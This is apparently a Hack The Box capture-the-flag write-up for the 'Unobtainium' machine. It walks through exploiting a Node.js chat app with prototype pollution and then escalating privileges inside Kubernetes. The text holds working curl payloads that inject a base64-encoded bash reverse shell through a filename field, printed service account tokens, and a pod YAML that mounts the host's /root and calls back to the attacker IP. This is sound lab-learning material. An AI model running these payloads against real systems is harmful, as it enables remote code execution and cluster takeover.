Unobtainium

Posted on Sep 6, 2021

HTB - Unobtainium


NMAP

We begin with nmap

All ports

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-14 06:46 EDT
Nmap scan report for 10.10.10.235
Host is up (5.6s latency).
Not shown: 49841 filtered ports, 15691 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2380/tcp open  etcd-server

Nmap done: 1 IP address (1 host up) scanned in 51.27 seconds

Open ports

nmap scan report for 10.10.10.235
Host is up (0.085s latency).

PORT     STATE SERVICE          VERSION
22/tcp   open  ssh              OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e4:bf:68:42:e5:74:4b:06:58:78:bd:ed:1e:6a:df:66 (RSA)
|   256 bd:88:a1:d9:19:a0:12:35:ca:d3:fa:63:76:48:dc:65 (ECDSA)
|_  256 cf:c4:19:25:19:fa:6e:2e:b7:a4:aa:7d:c3:f1:3d:9b (ED25519)
80/tcp   open  http             Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Unobtainium
2380/tcp open  ssl/etcd-server?
| ssl-cert: Subject: commonName=unobtainium
| Subject Alternative Name: DNS:localhost, DNS:unobtainium, IP Address:10.10.10.3, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2021-01-17T07:10:30
|_Not valid after:  2022-01-17T07:10:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  h2
| tls-nextprotoneg: 
|_  h2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.72 seconds

From the website we download the .deb package. We extract the .deb package

└─$ cat control 
Package: unobtainium
Version: 1.0.0
License: ISC
Vendor: felamos <felamos@unobtainium.htb>
Architecture: amd64
Maintainer: felamos <felamos@unobtainium.htb>
Installed-Size: 185617
Depends: libgtk-3-0, libnotify4, libnss3, libxss1, libxtst6, xdg-utils, libatspi2.0-0, libuuid1, libappindicator3-1, libsecret-1-0
Section: default
Priority: extra
Homepage: http://unobtainium.htb
Description: 
  client

We install the package and run it.

Looks like some kind of chat application.

If we send a message and inspect the traffic in Wireshark, we get credentials in cleartext.

Looking at the traffic when we press Todo

If we change the filename to index.js we obtain the contents of the file. Cleaning up the source code:

{"ok":true,"content":"var root = require("google-cloudstorage-commands");
const express = require('express');
const { exec } = require("child_process");     
const bodyParser = require('body-parser');     
const _ = require('lodash');                                                                  
const app = express();
var fs = require('fs');
                                                                                              
const users = [                                                                               
  {name: 'felamos', password: 'Winter2021'},
  {name: 'admin', password: Math.random().toString(32), canDelete: true, canUpload: true},      
];

let messages = [];                             
let lastId = 1;                                
                                                                                              
function findUser(auth) {                                                                     
  return users.find((u) =>                                                                    
    u.name === auth.name &&                                                                   
    u.password === auth.password);                                                            
}                                    
                                               
app.use(bodyParser.json());                                                                   
                                               
app.get('/', (req, res) => {                   
  res.send(messages);                                                                         
});                                                                                           
                                                                                              
app.put('/', (req, res) => {   
  const user = findUser(req.body.auth || {});                                                 
                                               
  if (!user) {                                 
    res.status(403).send({ok: false, error: 'Access denied'});                                
    return;
  }

  const message = {
    icon: '__',
  };

  _.merge(message, req.body.message, {
    id: lastId++,
    timestamp: Date.now(),
    userName: user.name,
  });

  messages.push(message);
  res.send({ok: true});
});

app.delete('/', (req, res) => {
  const user = findUser(req.body.auth || {});

  if (!user || !user.canDelete) {
    res.status(403).send({ok: false, error: 'Access denied'});
    return;
  }

  messages = messages.filter((m) => m.id !== req.body.messageId);
  res.send({ok: true});
});
app.post('/upload', (req, res) => {
  const user = findUser(req.body.auth || {});
  if (!user || !user.canUpload) {
    res.status(403).send({ok: false, error: 'Access denied'});
    return;
  }


  filename = req.body.filename;
  root.upload("./",filename, true);
  res.send({ok: true, Uploaded_File: filename});
});

app.post('/todo', (req, res) => {
tconst user = findUser(req.body.auth || {});
tif (!user) {
ttres.status(403).send({ok: false, error: 'Access denied'});
ttreturn;
t}

tfilename = req.body.filename;
        testFolder = "/usr/src/app";
        fs.readdirSync(testFolder).forEach(file => {
                if (file.indexOf(filename) > -1) {
                        var buffer = fs.readFileSync(filename).toString();
                        res.send({ok: true, content: buffer});
                }
        });
});

app.listen(3000);
console.log('Listening on port 3000...');
"}        

Turns out that the application is vulnerable to json prototype pollution.

The source code of the application appears to be forked of this repo.

Prototype Pollution in JavaScript

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

source

So we try use the methods explained in the repo and try to give our user the ability to upload files.

┌──(bob㉿kali)-[~/htb/Unobtainium]
└─$ curl --request PUT \ 
  --url http://unobtainium:31337 \
  --header 'content-type: application/json' \
  --data '{"auth": {"name": "felamos", "password": "Winter2021"}, "message": { "text": "bad", "__proto__": {"canUpload": true}}}'

{"ok":true}

More detailed explanation on the vulnerability here

We can get command execution by inputting commands in {"filena": "dfd; command"} After playing with some different versions, we finally get a shell with

┌──(bob㉿kali)-[~/htb/Unobtainium]
└─$ curl --request POST \                                                                
  --url http://unobtainium:31337/upload \
  --header 'content-type: application/json' \
  --data '{"auth":{"name":"felamos","password":"Winter2021"},"filename":"ff333333; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42NS85MDAxIDA+JjE= | base64 -d | bash"}'
{"ok":true,"Uploaded_File":"ff333333; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42NS85MDAxIDA+JjE= | base64 -d | bash"}'
                                        

┌──(bob㉿kali)-[~/htb/Unobtainium]
└─$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.16.65] from (UNKNOWN) [10.10.10.235] 44840
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@webapp-deployment-5d764566f4-mbprj:/usr/src/app# 

The userflag is located In $HOME.

drwxr-xr-x 2 root root 4096 Apr 14 13:36 .
drwxr-xr-x 1 root root 4096 Apr 14 10:36 ..
-rw------- 1 root root 2376 Apr 14 22:30 .bash_history
-rw-r--r-- 2 root root   33 Apr 14 10:35 user.txt
root@webapp-deployment-5d764566f4-lrpt9:~# 

Privilege Escalation

Enumerating kubernetes

From /etc/hosts we learn that we are likelyin a kubernetes pod.

To work with kubernetes we need kubectl


find / -name kubectl 2>/dev/null 
<pt9:/usr/src/app# find / -name kubectl 2>/dev/null    

So we download the kubectl binary and make it executable.

We get the namespace by running kubectl get namespace

NAME              STATUS   AGE
default           Active   89d
dev               Active   88d
kube-node-lease   Active   89d
kube-public       Active   89d
kube-system       Active   89d

When we try to enumerate the namespaces, we only find that we have permissions to dev.

NAME                                READY   STATUS    RESTARTS   AGE
devnode-deployment-cd86fb5c-6ms8d   1/1     Running   28         88d
devnode-deployment-cd86fb5c-mvrfz   1/1     Running   29         88d
devnode-deployment-cd86fb5c-qlxww   1/1     Running   29         88d
./kubectl get pods -n default
./kubectl get pods -n default
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" in the namespace "default"
./kubectl get pods -n kube-node-lease
<4-lrpt9:/tmp# ./kubectl get pods -n kube-node-lease
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" in the namespace "kube-node-lease"
./kubectl get pods -n kube-public
<566f4-lrpt9:/tmp# ./kubectl get pods -n kube-public
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" in the namespace "kube-public"
./kubectl get pods -n kube-system
<566f4-lrpt9:/tmp# ./kubectl get pods -n kube-system
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" in the namespace "kube-system"
root@webapp-deployment-5d764566f4-lrpt9:/tmp# 

We describe each pod in dev.

describe pod devnode-deployment-cd86fb5c-6ms8d -n dev

Name:         devnode-deployment-cd86fb5c-6ms8d
Namespace:    dev
Priority:     0
Node:         unobtainium/10.10.10.235
Start Time:   Sun, 17 Jan 2021 18:16:21 +0000
Labels:       app=devnode
             pod-template-hash=cd86fb5c
Annotations:  <none>
Status:       Running
IP:           172.17.0.6
IPs:
 IP:           172.17.0.6
Controlled By:  ReplicaSet/devnode-deployment-cd86fb5c
Containers:
 devnode:
   Container ID:   docker://d91f29af3545c32e260a370561834726b8372fb83f2c7d67da2d30be745f4443
   Image:          localhost:5000/node_server
   Image ID:       docker-pullable://localhost:5000/node_server@sha256:f3bfd2fc13c7377a380e018279c6e9b647082ca590600672ff787e1bb918e37c
   Port:           3000/TCP
   Host Port:      0/TCP
   State:          Running
     Started:      Wed, 14 Apr 2021 10:36:17 +0000
   Last State:     Terminated
     Reason:       Error
     Exit Code:    137
     Started:      Wed, 24 Mar 2021 16:01:28 +0000
     Finished:     Wed, 24 Mar 2021 16:02:13 +0000
   Ready:          True
   Restart Count:  28
   Environment:    <none>
   Mounts:
     /var/run/secrets/kubernetes.io/serviceaccount from default-token-rmcd6 (ro)
Conditions:
 Type              Status
 Initialized       True 
 Ready             True 
 ContainersReady   True 
 PodScheduled      True 
Volumes:
 default-token-rmcd6:
   Type:        Secret (a volume populated by a Secret)
   SecretName:  default-token-rmcd6
   Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:          <none>
<scribe pod devnode-deployment-cd86fb5c-mvrfz -n dev
Name:         devnode-deployment-cd86fb5c-mvrfz
Namespace:    dev
Priority:     0
Node:         unobtainium/10.10.10.235
Start Time:   Sun, 17 Jan 2021 18:16:21 +0000
Labels:       app=devnode
              pod-template-hash=cd86fb5c
Annotations:  <none>
Status:       Running
IP:           172.17.0.4
IPs:
  IP:           172.17.0.4
Controlled By:  ReplicaSet/devnode-deployment-cd86fb5c
Containers:
  devnode:
    Container ID:   docker://36fafdfa5e52aadc4ed43ea229c5b31eaf6ee809b6d905506465151079b966e7
    Image:          localhost:5000/node_server
    Image ID:       docker-pullable://localhost:5000/node_server@sha256:f3bfd2fc13c7377a380e018279c6e9b647082ca590600672ff787e1bb918e37c
    Port:           3000/TCP
    Host Port:      0/TCP
    State:          Running
      Started:      Wed, 14 Apr 2021 10:36:17 +0000
    Last State:     Terminated
      Reason:       Error
      Exit Code:    137
      Started:      Wed, 24 Mar 2021 16:01:31 +0000
      Finished:     Wed, 24 Mar 2021 16:02:12 +0000
    Ready:          True
    Restart Count:  29
    Environment:    <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from default-token-rmcd6 (ro)
Conditions:
  Type              Status
  Initialized       True 
  Ready             True 
  ContainersReady   True 
  PodScheduled      True 
Volumes:
  default-token-rmcd6:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  default-token-rmcd6
    Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                 node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:          <none>
<scribe pod devnode-deployment-cd86fb5c-qlxww -n dev
Name:         devnode-deployment-cd86fb5c-qlxww
Namespace:    dev
Priority:     0
Node:         unobtainium/10.10.10.235
Start Time:   Sun, 17 Jan 2021 18:16:21 +0000
Labels:       app=devnode
             pod-template-hash=cd86fb5c
Annotations:  <none>
Status:       Running
IP:           172.17.0.5
IPs:
 IP:           172.17.0.5
Controlled By:  ReplicaSet/devnode-deployment-cd86fb5c
Containers:
 devnode:
   Container ID:   docker://3425fcb18cf327bba0a6468e570602cd6eb1058235f0fdb1e538d70d7421a844
   Image:          localhost:5000/node_server
   Image ID:       docker-pullable://localhost:5000/node_server@sha256:f3bfd2fc13c7377a380e018279c6e9b647082ca590600672ff787e1bb918e37c
   Port:           3000/TCP
   Host Port:      0/TCP
   State:          Running
     Started:      Wed, 14 Apr 2021 10:36:17 +0000
   Last State:     Terminated
     Reason:       Error
     Exit Code:    137
     Started:      Wed, 24 Mar 2021 16:01:33 +0000
     Finished:     Wed, 24 Mar 2021 16:02:12 +0000
   Ready:          True
   Restart Count:  29
   Environment:    <none>
   Mounts:
     /var/run/secrets/kubernetes.io/serviceaccount from default-token-rmcd6 (ro)
Conditions:
 Type              Status
 Initialized       True 
 Ready             True 
 ContainersReady   True 
 PodScheduled      True 
Volumes:
 default-token-rmcd6:
   Type:        Secret (a volume populated by a Secret)
   SecretName:  default-token-rmcd6
   Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:          <none>

Getting Service Token

From Enumerating the different pods, it looks like each pod is running the same webapp as we exploited (this is common for load balancing purposes).

We use the same exploit to get a reverse shell on the pod

172.17.0.4

eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZXYiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlY3JldC5uYW1lIjoiZGVmYXVsdC10b2tlbi1ybWNkNiIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50Lm5hbWUiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMzQxZTdlNjYtNGIwZC00YTZlLWIzODgtOWE2ODQwNTVmOWRmIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRldjpkZWZhdWx0In0.NdoMnigZmgPQR98lNmLdrF8iG_4yJMEVnyM0UHoZ4B2lh_Dve524sohFRhoBM3hxN2He7l0P3U2lSZXZO272tlmj48lly-_fGRfQ4xcXIbH7lvmiq2qHKcP4MJGql5X4NH4ereZvwkTvSyduRmEcw31qmn1Gres2eQxf4_2WBsC_4CAyMQPMktS1O6p54c_0BaX76ZGJjXKHsOXhrBZ1jzTcX8OGdlfss2eaMv1DtYkzqoK7Ug5Ru7LpUNsqfooWNdekYFCBj6OZxIwIgPbz0pgIPgByJAm6gUBnpaya4vnUzkIPBsek7rr5fz6OKxeggOo5ZjbLOyQSuVFpn43TIw
curl --request PUT --url http://172.17.0.6:3000 \
  --header 'content-type: application/json' \
  --data '{"auth": {"name": "felamos", "password": "Winter2021"}, "message": { "text": "bad", "__proto__": {"canUpload": true}}}'
  
  curl --request POST --url http://172.17.0.6:3000/upload \
  --header 'content-type: application/json' \
  --data '{"auth":{"name":"felamos","password":"Winter2021"},"filename":"ff3333; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42NS85MDAxIDA+JjE= | base64 -d | bash"}'

From here we want to get the Service Account Token.

Get on that with same method as getting user on port 3000 Get the token from cat /run/secrets/kubernetes.io/serviceaccount/token

Back on the other pod, we enumerate each namespace to see what we can do and discover we can get secrets from kube-system.

./kubectl -n kube-system --token eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZXYiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlY3JldC5uYW1lIjoiZGVmYXVsdC10b2tlbi1ybWNkNiIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50Lm5hbWUiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMzQxZTdlNjYtNGIwZC00YTZlLWIzODgtOWE2ODQwNTVmOWRmIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRldjpkZWZhdWx0In0.NdoMnigZmgPQR98lNmLdrF8iG_4yJMEVnyM0UHoZ4B2lh_Dve524sohFRhoBM3hxN2He7l0P3U2lSZXZO272tlmj48lly-_fGRfQ4xcXIbH7lvmiq2qHKcP4MJGql5X4NH4ereZvwkTvSyduRmEcw31qmn1Gres2eQxf4_2WBsC_4CAyMQPMktS1O6p54c_0BaX76ZGJjXKHsOXhrBZ1jzTcX8OGdlfss2eaMv1DtYkzqoK7Ug5Ru7LpUNsqfooWNdekYFCBj6OZxIwIgPbz0pgIPgByJAm6gUBnpaya4vnUzkIPBsek7rr5fz6OKxeggOo5ZjbLOyQSuVFpn43TIw auth can-i --list
<rr5fz6OKxeggOo5ZjbLOyQSuVFpn43TIw auth can-i --list
Resources                                       Non-Resource URLs                     Resource Names   Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]
secrets                                         []                                    []               [get list]
                                                [/.well-known/openid-configuration]   []               [get]
                                                [/api/*]                              []               [get]
                                                [/api]                                []               [get]
                                                [/apis/*]                             []               [get]
                                                [/apis]                               []               [get]
                                                [/healthz]                            []               [get]
                                                [/healthz]                            []               [get]
                                                [/livez]                              []               [get]
                                                [/livez]                              []               [get]
                                                [/openapi/*]                          []               [get]
                                                [/openapi]                            []               [get]
                                                [/openid/v1/jwks]                     []               [get]
                                                [/readyz]                             []               [get]
                                                [/readyz]                             []               [get]
                                                [/version/]                           []               [get]
                                                [/version/]                           []               [get]
                                                [/version]                            []               [get]
                                                [/version]                            []               [get]

Now we get secrets

/kubectl --token eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZXYiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlY3JldC5uYW1lIjoiZGVmYXVsdC10b2tlbi1ybWNkNiIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50Lm5hbWUiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMzQxZTdlNjYtNGIwZC00YTZlLWIzODgtOWE2ODQwNTVmOWRmIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRldjpkZWZhdWx0In0.NdoMnigZmgPQR98lNmLdrF8iG_4yJMEVnyM0UHoZ4B2lh_Dve524sohFRhoBM3hxN2He7l0P3U2lSZXZO272tlmj48lly-_fGRfQ4xcXIbH7lvmiq2qHKcP4MJGql5X4NH4ereZvwkTvSyduRmEcw31qmn1Gres2eQxf4_2WBsC_4CAyMQPMktS1O6p54c_0BaX76ZGJjXKHsOXhrBZ1jzTcX8OGdlfss2eaMv1DtYkzqoK7Ug5Ru7LpUNsqfooWNdekYFCBj6OZxIwIgPbz0pgIPgByJAm6gUBnpaya4vnUzkIPBsek7rr5fz6OKxeggOo5ZjbLOyQSuVFpn43TIw -n kube-system get secrets
<eggOo5ZjbLOyQSuVFpn43TIw -n kube-system get secrets
NAME                                             TYPE                                  DATA   AGE
attachdetach-controller-token-5dkkr              kubernetes.io/service-account-token   3      89d
bootstrap-signer-token-xl4lg                     kubernetes.io/service-account-token   3      89d
c-admin-token-tfmp2                              kubernetes.io/service-account-token   3      88d
certificate-controller-token-thnxw               kubernetes.io/service-account-token   3      89d
clusterrole-aggregation-controller-token-scx4p   kubernetes.io/service-account-token   3      89d
coredns-token-dbp92                              kubernetes.io/service-account-token   3      89d
cronjob-controller-token-chrl7                   kubernetes.io/service-account-token   3      89d
daemon-set-controller-token-cb825                kubernetes.io/service-account-token   3      89d
default-token-l85f2                              kubernetes.io/service-account-token   3      89d
deployment-controller-token-cwgst                kubernetes.io/service-account-token   3      89d
disruption-controller-token-kpx2x                kubernetes.io/service-account-token   3      89d
endpoint-controller-token-2jzkv                  kubernetes.io/service-account-token   3      89d
endpointslice-controller-token-w4hwg             kubernetes.io/service-account-token   3      89d
endpointslicemirroring-controller-token-9qvzz    kubernetes.io/service-account-token   3      89d
expand-controller-token-sc9fw                    kubernetes.io/service-account-token   3      89d
generic-garbage-collector-token-2hng4            kubernetes.io/service-account-token   3      89d
horizontal-pod-autoscaler-token-6zhfs            kubernetes.io/service-account-token   3      89d
job-controller-token-h6kg8                       kubernetes.io/service-account-token   3      89d
kube-proxy-token-jc8kn                           kubernetes.io/service-account-token   3      89d
namespace-controller-token-2klzl                 kubernetes.io/service-account-token   3      89d
node-controller-token-k6p6v                      kubernetes.io/service-account-token   3      89d
persistent-volume-binder-token-fd292             kubernetes.io/service-account-token   3      89d
pod-garbage-collector-token-bjmrd                kubernetes.io/service-account-token   3      89d
pv-protection-controller-token-9669w             kubernetes.io/service-account-token   3      89d
pvc-protection-controller-token-w8m9r            kubernetes.io/service-account-token   3      89d
replicaset-controller-token-bzbt8                kubernetes.io/service-account-token   3      89d
replication-controller-token-jz8k8               kubernetes.io/service-account-token   3      89d
resourcequota-controller-token-wg7rr             kubernetes.io/service-account-token   3      89d
root-ca-cert-publisher-token-cnl86               kubernetes.io/service-account-token   3      89d
service-account-controller-token-44bfm           kubernetes.io/service-account-token   3      89d
service-controller-token-pzjnq                   kubernetes.io/service-account-token   3      89d
statefulset-controller-token-z2nsd               kubernetes.io/service-account-token   3      89d
storage-provisioner-token-tk5k5                  kubernetes.io/service-account-token   3      89d
token-cleaner-token-wjvf9                        kubernetes.io/service-account-token   3      89d
ttl-controller-token-z87px                       kubernetes.io/service-account-token   3      89d

run /kubectl -n <namespace> --token <token> auth can-i --list Get the secrets kubectl --token <> -n kube-system get secrets We learn from this talk at RSA 2020 that the daemon-set-controller-token-cb825 and replicaset-controller-token-bzbt8 has permissions to create.

We get the token of daemon-set-controller-token-cb825 by running kubectl --token <token> -n kube-system describe secrets daemon-set-controller-token-cb825 Copy token

[...]
Name:         daemon-set-controller-token-cb825
Namespace:    kube-system
Labels:       <none>
Annotations:  kubernetes.io/service-account.name: daemon-set-controller
             kubernetes.io/service-account.uid: 58a5014a-5be1-4144-8256-ebbe3b0d3eff

Type:  kubernetes.io/service-account-token

Data
====
token:      eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkYWVtb24tc2V0LWNvbnRyb2xsZXItdG9rZW4tY2I4MjUiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGFlbW9uLXNldC1jb250cm9sbGVyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiNThhNTAxNGEtNWJlMS00MTQ0LTgyNTYtZWJiZTNiMGQzZWZmIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRhZW1vbi1zZXQtY29udHJvbGxlciJ9.Sube7Qn6hgQI_E9KRKOgSCzBnfbivCB_M_nUXAT-Hxh_i9ZLqGNeUlFzgnbHpGKMaKoyhM01rkMazQkndPq_RvfFBSq27ZKxPEVZW6lT0x3pN3m4aHbb0ZoYR6mM6ppR4u2aYgB6jpQcx7jkkyb-wzlLHHig6BIbpasJnAFc2SoadGEcSghASGwzqHMRbBVtltMc_IxEsZgxNciI4ehakPSc4VJQ1ah6K7xLuJDXJf8RYz9yVpwZXUeE6xhlNqDNzlXDaGXImP7QdTSI5IcCoe6hbjnoJHKIN1oijQ1sWQbuG6d0PxjeEEilKUtfuwcWCRSUP5Qx1LJ6-GG6TcwiFg
ca.crt:     1066 bytes
namespace:  11 bytes

Create pod with yaml (we get the image by running kubectl get pods --all-namespaces --token <daemon_controller_set_token> )

apiVersion: v1
kind: Pod
metadata:
 name: some-pod
 namespace: default
spec:
 containers:
   - name: web
     image: localhost:5000/dev-alpine
     command: ["/bin/sh"]
     args: ["-c", 'bash -i >& /dev/tcp/10.10.16.65/9001 0>&1']
     volumeMounts:
     - mountPath: /root/
       name: root-flag
 volumes:
 - hostPath:
     path: /root/
     type: ""
   name: root-flag

We save the yaml on our box and download it on the victim. Then we create it by running runkubectl create -f <yaml> -token <daemon token> and the pod is created and we get our root shell.

#prototypepollution